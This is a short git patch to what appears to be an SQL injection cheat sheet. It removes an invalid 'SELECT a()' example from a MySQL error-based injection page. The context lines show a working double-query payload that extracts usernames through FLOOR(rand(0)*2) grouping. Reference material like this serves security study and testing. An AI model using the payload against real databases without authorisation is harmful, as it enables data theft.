From abae488b6da26a34693cacc994201be8f94c486a Mon Sep 17 00:00:00 2001 From: Xib3rR4dAr <24238512+Xib3rR4dAr@users.noreply.github.com> Date: Tue, 2 May 2023 16:55:01 +0500 Subject: [PATCH] Update mysql.html Removed invalid function a(), which should have been database(). --- injectionTypes/errorBased/mysql.html | 4 ---- 1 file changed, 4 deletions(-) diff --git a/injectionTypes/errorBased/mysql.html b/injectionTypes/errorBased/mysql.html index 53debef..49759e9 100644 --- a/injectionTypes/errorBased/mysql.html +++ b/injectionTypes/errorBased/mysql.html @@ -37,9 +37,5 @@

Error Based

Double Query SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)

Increment Limit 0,1 to Limit 1,1 to begin cycling through data - - Get Current Database - SELECT a() -